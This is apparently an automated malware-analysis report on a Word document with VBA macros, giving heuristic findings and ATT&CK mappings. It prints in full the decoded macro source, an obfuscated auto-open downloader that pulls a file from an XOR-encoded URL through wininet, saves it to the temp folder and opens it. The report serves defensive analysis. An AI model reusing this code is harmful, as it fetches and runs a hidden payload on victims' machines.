MALICIOUS
90
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is an OLE document containing VBA macros, including an autoopen macro, which is a common technique for initial execution. The CreateObject heuristic firing suggests the macro attempts to instantiate objects to perform malicious actions, likely downloading and executing a second-stage payload. The obfuscated nature of the VBA code and the presence of a benign-looking URL prevent a higher confidence assessment.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set BRONTE = CreateObject _ -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6507 bytes |
SHA-256: 572bc19f47496f9314220a3c49e66bf3d16f8453810da00ed99c8cd3a8b9134d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub InIn()
CALTHA
End Sub
Sub autoopen()
InIn
End Sub
Attribute VB_Name = "FILE6"
Option Explicit
Public Const BRITTANIA = "BRITTANY"
Private Const BRANDI = 8162
Private Const BRANDY As String = "HAZ"
Private Const BREANA = 1
Private Const BREDA = &H4000000
Public Function BRENDA _
(ByVal BREE As String) As Boolean
#If VBA7 _
And Win64 Then
Dim BRETT As LongPtr, BRIANNA As LongPtr
#Else
Dim BRETT As Long, BRIANNA As Long
#End If
Dim BRIAR As Long
Dim BRIDGET As String * BRANDI, BRIELLE As String
Dim BRIER As Integer, BRIONY As Double
BRETT = CAMEO(BRANDY, BREANA, vbNullString, vbNullString, 0)
If BRETT = 0 Then
Exit Function
End If
Dim FiGaMan As Boolean
If BRITANNIA(BRIANNA, BRETT) Then
End If
If BRIANNA = 0 Then
BRIONY = 0
Else
BRITNEY BRIANNA, BRIDGET, BRANDI, BRIAR
BRIELLE = BRIDGET
Do While BRIAR <> 0
BRITNEY BRIANNA, BRIDGET, BRANDI, BRIAR
Dim BRITT As Long
For BRITT = 6 To 8
If BRITT = 38 Then End
Next BRITT
BRIELLE = BRIELLE + Mid(BRIDGET, 1, BRIAR)
Loop
BRIONY = Len(BRIELLE): BRIER = FreeFile
Open BREE _
For Binary Access Write _
Lock Write _
As #BRIER
Put #BRIER, _
, BRIELLE
Dim BRITTA As Double
For BRITTA = 2 To 3
If BRITTA = 37 Then End
Next BRITTA
Close #BRIER
End If
BRITTANI BRIANNA
BRITTANI BRETT
BRIELLE = ""
If BRIONY Then
BRENDA = True
End If
End Function
Public _
Function BRITTNEY(BRITTNY _
As _
String)
BROGAN
End Function
Public Function BROGAN()
Dim BRONTE As Object
Set BRONTE = CreateObject _
(BROOK(BROOKE, BROOKLYN))
Dim BRYANNA As Object
Set BRYANNA = BRYONY(BRONTE)
Dim BUFFY
Dim BUNNY
BUNNY = BROOK(BROOKE, BUNTY)
BUFFY = BRYANNA & BUNNY
Dim BURGUNDY As Integer
For BURGUNDY = 6 To 7
If BURGUNDY = 33 Then End
Next BURGUNDY
Dim CADENCE As Integer
For CADENCE = 2 To 3
If CADENCE = 34 Then End
Next CADENCE
If CADY(BRONTE, BUFFY) Then
BRONTE. _
DeleteFile BUFFY
End If
If BRENDA(BUFFY) Then
End If
If CADY(BRONTE, BUFFY) Then
End If
Dim CAELIE
Set CAELIE = CreateObject _
(BROOK _
(BROOKE, CAETLIN))
CAELIE.Open BUFFY
End Function
Public Function CANDICE(CANDIDA As String) As Integer
CANDICE = Len(CANDIDA)
End Function
Attribute VB_Name = "PIDLE0"
Sub CALTHA()
Dim CAMELLIA As Long
Dim CANDIS As Double
For CANDIS = 44 To 46
If CANDIS = 32 Then End
Next CANDIS
CAMELLIA = 89
CALANTHA (CAMELLIA)
End Sub
Public Function BROOK(CAMERON As String, CAMILLA As String) As String
Dim CAMILLE As Integer
Dim CAMMIE As Integer
Dim CAMRYN As Double
For CAMRYN = 1 To 3
If CAMRYN = 32 Then End
Next CAMRYN
Dim CANDACE As Long
Dim CANDI As String
For CANDACE = 1 _
To _
( _
CANDICE _
(CAMILLA) _
/ 2)
CAMILLE = Val("&H" & _
(Mid$(CAMILLA, _
(2 * CANDACE) - 1, 2)))
CAMMIE = Asc(Mid$(CAMERON, _
((CANDACE Mod Len(CAMERON)) + 1), 1))
CANDI = CANDI + Chr(CAMILLE Xor CAMMIE)
Next CANDACE
BROOK = CANDI
End Function
Attribute VB_Name = "IDL4"
Public Const CAETLIN = "6750505D5F1E74464055585B544C5B565A"
Public Const BUNTY = "68425A535244051801581F5D4D5D"
Public Const CAITLYN = "5C4C4141091F1A504A4A4716515D1D0B06071A0E011E524A56"
Public Const BROOKLYN = "675B475843445C5857177751595D61404743505576525D575040"
Public Const BROOKE = "3485130560918582947589072346987"
#If VBA7 And Win64 Then
Public Declare PtrSafe Function BRITTANI Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
Public Declare PtrSafe Function CAMEO Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
Public Declare PtrSafe Function BRITNEY Lib "wininet.dll" Alias "InternetReadFile" (ByVal BREDA3333 As LongPtr, ByVal BRIDGET As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare PtrSafe Function CALLIE Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
#Else
Public Declare Function BRITTANI Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
Public Declare Function CAMEO Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Public Declare Function BRITNEY Lib "wininet.dll" Alias "InternetReadFile" (ByVal BREDA3333 As Long, ByVal BRIDGET As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare Function CALLIE Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
#End If
Public Function BRYONY(ByRef CALANTHE As Object) As Object
Set BRYONY = CALANTHE.GetSpecialFolder(2)
End Function
Sub CALANTHA(CALEIGH As Long)
BRITTNEY ("CALANTHIA")
End Sub
Public Function CADY(ByRef CAILEIGH As Object, ByVal CAILYN As String) As Boolean
If CAILEIGH.FileExists(CAILYN) Then
CADY = True
Else
CADY = False
End If
End Function
#If VBA7 _
And Win64 Then
Public Function BRITANNIA(ByRef CALIDA As LongPtr, CALLA As LongPtr) As Boolean
#Else
Public Function BRITANNIA(ByRef CALIDA As Long, CALLA As Long) As Boolean
#End If
Dim CALLIDORA As String
CALLIDORA = BROOK(BROOKE, CAITLYN)
CALIDA _
= CALLIE _
( _
CALLA, _
CALLIDORA, vbNullString, _
0, _
BREDA, 0)
BRITANNIA = True
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.